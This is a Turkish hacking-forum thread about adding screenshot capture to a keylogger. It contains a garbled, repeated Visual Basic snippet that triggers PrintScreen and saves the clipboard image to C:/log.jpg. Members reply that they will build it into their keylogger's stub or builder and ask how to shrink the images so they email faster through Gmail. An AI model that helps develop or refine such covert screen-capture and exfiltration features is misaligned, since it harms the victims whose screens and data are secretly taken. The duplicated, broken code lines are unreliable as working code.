Ekran Görüntüsü Alma ve Gönderme - Keylogger için

comez1

Yeni üye
9 Ocak 2011
1
0
ekran görüntüsünün belirli bir koordinatını almak istersek (panodan resimi al )resimi aktarmadan mı yoksa aktardıktan sonramı ayıra biliriz teşekkür ederim

If say.Caption = 200 Then

Call keybd_event(vbKeySnapshot, 0, 0, 0)

If Clipboard.GetFormat(vbCFBitmap) Then 'bmp ise

Picture1.Picture = Clipboard.GetData 'If say.Caption = 200 Then

Picture1.Picture = Clipboard.GetData 'panodan resimi al picture1de göster

Call SavePicture(Picture1.Picture, ("C:/log.jpg"))

Clipboard.ClearIf say.Caption = 200 Then

Picture1.Picture = Clipboard.GetData 'panodan resimi al picture1de göster

Clipboard.Clear picture1de göster

Clipboard.Clear

annassa

Üye
26 Tem 2010
78
0
Mail şifremizi neden yazdığımızı anlamadım. Kendi mailimizle kendimize mi mail atacak ? Paylaşım için teşekkürler :)

By Sokrates

Yeni üye
13 Eyl 2012
7
0
sana ne desem azdır kardeş ya 1 haftadır bu kodları arıyorum ama bulamıyordum iyi kodları düzenledin ve paylaştın şimdi bunu keylogger e uyguluyum çok güzel olacak

kardeş benim keylogger stub ve builder olmak üzere 2 parçadan oluşmaktadır ama bu kodları stub a mı yoksa builder e mi koyacaz

Son düzenleme:

et2

Üye
16 Eki 2012
157
0
ne zamandır böyle bir şey arıyorum ama vb6ymış
visual basic için varmı böyle kodlar usta?

yasin52200

Katılımcı Üye
28 Eki 2012
511
0
Ordu
kardeş eline sağlık yanlız benim bi sorunum var bu çektiği resmin boyutu en az 2.5 mb oluyor. bunuda gmaile en az 3 dakkada yolluo bu benim için sıkıntı oluo bu resmin boyutunu nasıl düşürebilirim kalitesini.

SonSehzade1

Yeni üye
9 Eyl 2012
47
0
Balıkesir/Bandırma
Arkadaşlar bendede gelmiyor galiba Nedeni şu bizim bilgisayarlarımızdaki resim formatı .jpg ama burda sanırım .bmp ise gönderiyor yani ben öyle düşünüyorum doğrumu bilen arkadaşlar ?

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.